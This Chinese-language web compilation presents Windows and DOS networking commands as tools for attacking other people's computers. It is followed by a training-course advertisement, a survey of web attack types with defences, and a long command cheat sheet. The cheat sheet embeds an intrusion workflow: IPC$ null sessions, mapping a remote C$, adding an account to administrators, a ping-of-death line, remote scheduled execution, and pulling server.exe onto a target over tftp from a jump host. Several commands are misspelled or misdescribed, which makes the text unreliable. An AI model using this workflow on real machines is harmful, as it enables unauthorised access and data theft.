網路安全命令_cmd攻擊別人電腦命令

1. 求在DOS下常用的網路命令

黑客必學DOS命令
一、ping命令

在Windows的控制窗口中（Windows 95/98/ME的command解釋器、Windows NT/2000的cmd解釋器），運行ping可以看到這個命令的說明，它是一個探測本地電腦和遠程電腦之間信息傳送速度的命令，這個命令需要TCP/IP協議的支持，ping將會計算一條信息從本地發送到遠程再返回所需要的時間，黑客使用這個命令決定是否對伺服器進行攻擊，因為連接速度過慢會浪費時間、花費過多的上網費用。

另外這個命令還可以透過域名找到對方伺服器的IP地址，我們知道域名只是提供給瀏覽網頁用的，當我們看到一個不錯的域名地址後，要想通過telnet連接它，就必須知道對方的IP地址，這里也要使用ping命令的。

這個命令的基本使用格式可以通過直接運行ping獲得，現在假設目標是http://www.abc.com/，則可以在控制台下輸入ping www.abc.com，經過等待會得到如下信息：

Pinging www.abc.com [204.202.136.32] with 32 bytes of data:

Reply from 204.202.136.32: bytes=32 time=302ms TTL=240

Reply from 204.202.136.32: bytes=32 time=357ms TTL=240

Reply from 204.202.136.32: bytes=32 time=288ms TTL=240

Reply from 204.202.136.32: bytes=32 time=274ms TTL=240

Ping statistics for 204.202.136.32:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 274ms, Maximum = 357ms, Average = 305ms

這些信息的意思是：www.abc.com的IP地址是204.202.136.32，對他發送了四次數據包，數據包的大小是32位元組，每一次返回的時間分別是302ms、357ms、288ms、274ms。綜合看，發送了四個數據包全部返回，最小時間是274ms，最大時間357ms，他們的平均時間是305ms。

這樣黑客就了解了連接對方伺服器使用的時間。另外這個命令還有一些特殊的用法，例如可以通過IP地址反查伺服器的NetBIOS名，現在以211.100.8.87為例，使用ping配合「-a」，在控制台下輸入命令ping -a 211.100.8.87，它的返回結果是：

Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:

Reply from 211.100.8.87: bytes=32 time=96ms TTL=120

Reply from 211.100.8.87: bytes=32 time=110ms TTL=120

Reply from 211.100.8.87: bytes=32 time=110ms TTL=120

Reply from 211.100.8.87: bytes=32 time=109ms TTL=120

Ping statistics for 211.100.8.87:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 96ms, Maximum = 110ms, Average = 106ms

從這個結果會知道伺服器的NetBIOS名稱是POPNET-FBZ9JDFV。另外在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小，粗略的判斷目標主機的系統類型是Windows系列還是UNIX/linux系列，一般情況下Windows系列的系統返回的TTL值在100-130之間，而UNIX/Linux系列的系統返回的TTL值在240-255之間，例如上面的www.abc.com返回的TTL是240，對方的系統很可能是Linux，而第二個目標的TTL是120，那麼說明它使用的系統也許是Windows。

另外ping還有很多靈活的應用，我不在這里過多的介紹，讀者請另行查閱此命令相關幫助文件。

二、net命令：

NET命令是很多網路命令的集合，在Windows ME/NT/2000內，很多網路功能都是以net命令為開始的，通過net help可以看到這些命令的詳細介紹：

NET CONFIG 顯示系統網路設置

NET DIAG 運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息

NET HELP 顯示幫助信息

NET INIT 不通過綁定來載入協議或網卡驅動

NET LOGOFF 斷開連接的共享資源

NET LOGON 在WORKGROUP中登陸

NET PASSWORD 改變系統登陸密碼

NET PRINT 顯示或控制列印作業及列印隊列

NET START 啟動服務，或顯示已啟動服務的列表

NET STOP 停止網路服務

NET TIME 使計算機的時鍾與另一台計算機或域的時間同步

NET USE 連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息

NET VER 顯示區域網內正在使用的網路連接類型和信息

NET VIEW 顯示域列表、計算機列表或指定計算機的共享資源列表

這些命令在Win95/98中支持的比較少，只有幾個基本常見的，而在NT或者2000中又元元多於上面的介紹，不過大多數對於初學者也沒有必要掌握，所以我選擇了WindowsME進行介紹，其中最常用到的是NET VIEW和NET USE，通過者兩個命令，學習者可以連接網路上開放了遠程共享的系統，並且獲得資料。這種遠程共享本來是為便捷操作設計的，但是很多網路管理員忽視了它的安全性，所以造成了很多不應該共享的信息的暴露，對於學習者來說，則可以輕易獲得它人電腦上的隱私資料。

例如在控制台下輸入net view \\202.96.50.24則可以獲得對應IP的系統共享目錄，進而找到他們的共享文件，當然這需要202.96.50.24系統的確存在共享目錄，具體如何找到這些存在共享的系統，我將會在後面的文章中進行介紹。

三、telnet和ftp命令：

這兩個命令分別可以遠程對系統進行telnet登陸和ftp登陸，兩種登陸使用的不同的協議，分別屬於兩種不同的網路服務，ftp是遠程文件共享服務，也就是說學習者可以將自己的資料上傳、下載，但是它並沒有過多的權利，無法在遠程電腦上執行上傳的文件；而telnet則屬於遠程登陸服務，也就是說可以登陸到遠程系統上，並獲得一個解釋器許可權，擁有解釋器就意味著擁有了一定的許可權，這種許可權可能是基本的文件操作、也可能是可以控制系統的管理員許可權。
四、netstat命令：

這個程序有助於我們了解網路的整體使用情況。它可以顯示當前正在活動的網路連接的詳細信息，如採用的協議類型、當前主機與遠端相連主機（一個或多個）的IP地址以及它們之間的連接狀態等。使用netstat ？可以顯示它的命令格式和參數說明：

netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的參數說明如下：

-a 顯示所有主機的埠號；

-e 顯示乙太網統計信息；

-n 以數字表格形式顯示地址和埠；

-p proto 顯示特定的協議的具體使用信息；

-r 顯示本機路由表的內容；

-s 顯示每個協議的使用狀態（包括TCP、UDP、IP）；

interval 重新顯示所選的狀態，每次顯示之間的間隔數（單位秒）。

netstat命令的主要用途是檢測本地系統開放的埠，這樣做可以了解自己的系統開放了什麼服務、還可以初步推斷系統是否存在木馬，因為常見的網路服務開放的默認埠輕易不會被木馬佔用，例如：用於FTP（文件傳輸協議）的埠是21；用於TELNET（遠程登錄協議）的埠是23；用於SMTP（郵件傳輸協議）的埠是25；用於DNS（域名服務，即域名與IP之間的轉換）的埠是53；用於HTTP（超文本傳輸協議）的埠是80；用於POP3（電子郵件的一種接收協議）的埠是110；WINDOWS中開放的埠是139，除此以外，如果系統中還有其他陌生的到口，就可能是木馬程序使用的了。通過netstat或者netstat -a可以觀察開放的埠，如果發現下面的埠，就說明已經有木馬程序在系統中存在：

31337號埠是BackOffice木馬的默認埠；1999是Yai木馬程序；2140或者3150都是DEEP THROAT木馬使用的埠；還有NETBUS、冰河或者SUB7等木馬程序都可以自定義埠，因此發現了陌生埠一定要提高警惕，使用防火牆或者查病毒軟體進行檢測。

五、tracert命令：

這個命令的功能是判定數據包到達目的主機所經過的路徑、顯示數據包經過的中繼節點清單和到達時間。tracert命令的格式如下：

tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

命令行中的參數-d是要求tracert不對主機名進行解析，-h是指定搜索到目的地址的最大輪數，-j的功能是沿著主機列表釋放源路由，-w用來設置超時時間間隔。

通過tracert可以判斷一個伺服器是屬於國內還是國際（網路伺服器的物理未知不能依靠域名進行判斷），根據路由路經可以判斷信息從自己的系統發送到網路上，先後經過了哪些IP到大對方伺服器，這就好像乘公共汽車的時候從起點出發到達終點站的時候，中途會出現很多路牌一個道理，我們清楚了自己的信息的傳送路徑，才能夠更清晰的了解網路、對伺服器進行攻擊。

六、winipcfg：

winipcfg和ipconfig都是用來顯示主機內IP協議的配置信息。只是winipcfg適用於Windows 95/98，而ipconfig適用於Windows NT。winipcfg不使用參數，直接運行它，它就會採用Windows窗口的形式顯示具體信息。這些信息包括：網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等，點擊其中的「其他信息」，還可以查看主機的相關信息如：主機名、DNS伺服器、節點類型等。其中網路適配器的物理地址在檢測網路錯誤時非常有用。

ipconfig的命令格式如下：ipconfig [/? | /all | /release [adapter] | /renew [adapter]]

其中的參數說明如下：

使用不帶參數的ipconfig命令可以得到以下信息：IP地址、子網掩碼、默認網關。而使用ipconfig

/? 顯示ipconfig的格式和參數的英文說明；

/all 顯示所有的配置信息；

/release 為指定的適配器（或全部適配器）釋放IP地址（只適用於DHCP）；

/renew 為指定的適配器（或全部適配器）更新IP地址（只適用於DHCP）。

/all，則可以得到更多的信息：主機名、DNS伺服器、節點類型、網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等。

2. 帶網路命令的安全模式下如何上網

網路命令安全模式，只載入了網卡驅動，沒有載入相關PPOE協議；因此你只有在區域網里，才可以上網；也就是說，你在貓與電腦間接一個路由器，通過路由器組成了區域網，你就可以正常上外網了。

3. 網路安全是學什麼的啊

說白了，網路安全就是指網路系統中的數據受到保護不被破壞。而我們從事網路信息安全工作的安全工程師，主要工作當然是設計程序來維護網路安全了。

網路安全工程師是一個統稱，還包含很多職位，像安全產品工程師、安全分析師、數據恢復工程師、網路構架工程師、網路集成工程師、安全編程工程師等等。所有工作內容包括安全評測、風險評估、安全服務、防火牆、入侵檢測、雲防護、系統攻防、代碼審計等等。

學習網路安全的話，總體來說，

基礎要掌握：網路基礎（路由、交換）、操作系統（Windows、Linux）使用、資料庫基本操作、前後端有一些基礎；

其次確認你要學習的方向，因為網路安全行業真的是太龐大了，沒有一個人是全部精通，其中主要方向為：①移動安全 ②桌面安全③web安全 ④無線安全⑤工控安全⑥雲安全

以下是網路安全就業後的薪資，一般來說，0基礎學完了基本8K起步，可以對比參考。

就網路安全這一學科來說，其專業要求度高，學習內容涵蓋范圍廣、知識點繁多（除了網路硬體知識，還要學習各類系統知識和軟體編程），自學來說相對會難度比較高，而且沒有實操環境，基本上是不太可能學好網路安全的。因此學習網路安全建議還是選擇培訓班。

雖然目前社會上大部分IT培訓機構都在擴展開設網路安全培訓課程，但是真正算得上網路安全培訓的並不多。所以，對於初學者而言一定要選擇本身就背景強大、實力雄厚、開設專業網路安全課程的機構。可以重點從這幾方面看：

機構辦學背景、師資力量：是否有專業的網路安全行業背景，是否有業內多年項目經驗的專業師資團隊。舉個栗子，馬士兵運維安全學院作為網安的龍頭教學機構，目前開設的網路安全課程是與很多安全大廠商，如奇安信等大廠，合作教學。團隊核心教員擁有豐富的安防項目管理運維經驗，帶領學員從理論到實戰，由淺入深、循序漸進學習。
機構教學模式。是否有打造更適應企業需求的「場景式」教學模式，是否有足夠匹配的教學硬體設施設備，以滿足實踐教學需求，還原工作真實場景，培養學員分析問題和解決問題的能力。
課程內容體系。要想學好網路安全，一個專業系統化的課程內容體系是必不可少的。

以上，希望對你有所幫助。

想要學習網安的小夥伴建議考慮馬士兵教育，有任何問題歡迎私信~

4. 網路安全攻擊方法分為

1、跨站腳本-XSS
相關研究表明，跨站腳本攻擊大約占據了所有攻擊的40%，是最為常見的一類網路攻擊。但盡管最為常見，大部分跨站腳本攻擊卻不是特別高端，多為業余網路罪犯使用別人編寫的腳本發起的。
跨站腳本針對的是網站的用戶，而不是Web應用本身。惡意黑客在有漏洞的網站里注入一段代碼，然後網站訪客執行這段代碼。此類代碼可以入侵用戶賬戶，激活木馬程序，或者修改網站內容，誘騙用戶給出私人信息。
防禦方法：設置Web應用防火牆可以保護網站不受跨站腳本攻擊危害。WAF就像個過濾器，能夠識別並阻止對網站的惡意請求。購買網站託管服務的時候，Web託管公司通常已經為你的網站部署了WAF，但你自己仍然可以再設一個。
2、注入攻擊
開放Web應用安全項目新出爐的十大應用安全風險研究中，注入漏洞被列為網站最高風險因素。SQL注入方法是網路罪犯最常見的注入方法。
注入攻擊方法直接針對網站和伺服器的資料庫。執行時，攻擊者注入一段能夠揭示隱藏數據和用戶輸入的代碼，獲得數據修改許可權，全面俘獲應用。
防禦方法：保護網站不受注入攻擊危害，主要落實到代碼庫構建上。比如說：緩解SQL注入風險的首選方法就是始終盡量採用參數化語句。更進一步，可以考慮使用第三方身份驗證工作流來外包你的資料庫防護。
3、模糊測試
開發人員使用模糊測試來查找軟體、操作系統或網路中的編程錯誤和安全漏洞。然而，攻擊者可以使用同樣的技術來尋找你網站或伺服器上的漏洞。
採用模糊測試方法，攻擊者首先向應用輸入大量隨機數據讓應用崩潰。下一步就是用模糊測試工具發現應用的弱點，如果目標應用中存在漏洞，攻擊者即可展開進一步漏洞利用。
防禦方法：對抗模糊攻擊的最佳方法就是保持更新安全設置和其他應用，尤其是在安全補丁發布後不更新就會遭遇惡意黑客利用漏洞的情況下。
4、零日攻擊
零日攻擊是模糊攻擊的擴展，但不要求識別漏洞本身。此類攻擊最近的案例是谷歌發現的，在Windows和chrome軟體中發現了潛在的零日攻擊。
在兩種情況下，惡意黑客能夠從零日攻擊中獲利。第一種情況是：如果能夠獲得關於即將到來的安全更新的信息，攻擊者就可以在更新上線前分析出漏洞的位置。第二種情況是：網路罪犯獲取補丁信息，然後攻擊尚未更新系統的用戶。這兩種情況，系統安全都會遭到破壞，至於後續影響程度，就取決於黑客的技術了。
防禦方法：保護自己和自身網站不受零日攻擊影響最簡便的方法，就是在新版本發布後及時更新你的軟體。
5、路徑(目錄)遍歷
路徑遍歷攻擊針對Web
root文件夾，訪問目標文件夾外部的未授權文件或目錄。攻擊者試圖將移動模式注入伺服器目錄，以便向上爬升。成功的路徑遍歷攻擊能夠獲得網站訪問權，染指配置文件、資料庫和同一實體伺服器上的其他網站和文件。
防禦方法：網站能否抵禦路徑遍歷攻擊取決於你的輸入凈化程度。這意味著保證用戶輸入安全，並且不能從你的伺服器恢復出用戶輸入內容。最直觀的建議就是打造你的代碼庫，這樣用戶的任何信息都不會傳輸到文件系統API。即使這條路走不通，也有其他技術解決方案可用。
6、分布式拒絕服務-DDOS
DDoS攻擊本身不能使惡意黑客突破安全措施，但會令網站暫時或永久掉線。相關數據顯示：單次DDOS攻擊可令小企業平均損失12.3萬美元，大型企業的損失水平在230萬美元左右。
DDoS旨在用請求洪水壓垮目標Web伺服器，讓其他訪客無法訪問網站。僵屍網路通常能夠利用之前感染的計算機從全球各地協同發送大量請求。而且，DDoS攻擊常與其他攻擊方法搭配使用;攻擊者利用DDOS攻擊吸引安全系統火力，從而暗中利用漏洞入侵系統。
防禦方法：保護網站免遭DDOS攻擊侵害一般要從幾個方面著手：首先，需通過內容分發網路、負載均衡器和可擴展資源緩解高峰流量。其次，需部署Web應用防火牆，防止DDOS攻擊隱蔽注入攻擊或跨站腳本等其他網路攻擊方法。
7、中間人攻擊
中間人攻擊常見於用戶與伺服器間傳輸數據不加密的網站。作為用戶，只要看看網站的URL是不是以https開頭就能發現這一潛在風險了，因為HTTPS中的s指的就是數據是加密的，缺了S就是未加密。
攻擊者利用中間人類型的攻擊收集信息，通常是敏感信息。數據在雙方之間傳輸時可能遭到惡意黑客攔截，如果數據未加密，攻擊者就能輕易讀取個人信息、登錄信息或其他敏感信息。
防禦方法：在網站上安裝安全套接字層就能緩解中間人攻擊風險。SSL證書加密各方間傳輸的信息，攻擊者即使攔截到了也無法輕易破解。現代託管提供商通常已經在託管服務包中配置了SSL證書。
8、暴力破解攻擊
暴力破解攻擊是獲取Web應用登錄信息相當直接的一種方式。但同時也是非常容易緩解的攻擊方式之一，尤其是從用戶側加以緩解最為方便。
暴力破解攻擊中，攻擊者試圖猜解用戶名和密碼對，以便登錄用戶賬戶。當然，即使採用多台計算機，除非密碼相當簡單且明顯，否則破解過程可能需耗費幾年時間。
防禦方法：保護登錄信息的最佳辦法，是創建強密碼，或者使用雙因子身份驗證。作為網站擁有者，你可以要求用戶同時設置強密碼和2FA，以便緩解網路罪犯猜出密碼的風險。
9、使用未知代碼或第三方代碼
盡管不是對網站的直接攻擊，使用由第三方創建的未經驗證代碼，也可能導致嚴重的安全漏洞。
代碼或應用的原始創建者可能會在代碼中隱藏惡意字元串，或者無意中留下後門。一旦將受感染的代碼引入網站，那就會面臨惡意字元串執行或後門遭利用的風險。其後果可以從單純的數據傳輸直到網站管理許可權陷落。
防禦方法：想要避免圍繞潛在數據泄露的風險，讓你的開發人員分析並審計代碼的有效性。
10、網路釣魚
網路釣魚是另一種沒有直接針對網站的攻擊方法，但我們不能將它除在名單之外，因為網路釣魚也會破壞你系統的完整性。
網路釣魚攻擊用到的標准工具就是電子郵件。攻擊者通常會偽裝成其他人，誘騙受害者給出敏感信息或者執行銀行轉賬。此類攻擊可以是古怪的419騙局，或者涉及假冒電子郵件地址、貌似真實的網站和極具說服力用語的高端攻擊。
防禦方法：緩解網路釣魚騙局風險最有效的方法，是培訓員工和自身，增強對此類欺詐的辨識能力。保持警惕，總是檢查發送者電子郵件地址是否合法，郵件內容是否古怪，請求是否不合常理。

5. 網路命令應用

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名開啟服務；(如:net start telnet， net start schele)
net stop 服務名停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹目標地址\目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名查找某文件
title 標題名字更改CMD窗口標題名字
color 顏色值設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )

#3 三：

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名創建目錄
replace 源文件要替換文件的目錄替換文件
ren 原文件名新文件名重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名顯示文本文件的內容
more 文件名逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名導出注冊表
cacls 文件名參數顯示或修改文件訪問控制列表（ACL）--針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名查看文件的訪問用戶許可權列表
REM 文本內容在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

#4 四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名－p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)；建表
drop database 庫名;
drop table 表名；刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

#6 六：

Linux系統下基本命令：要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名以一頁一頁的方式顯示一個文本文件。
cp 復制文件
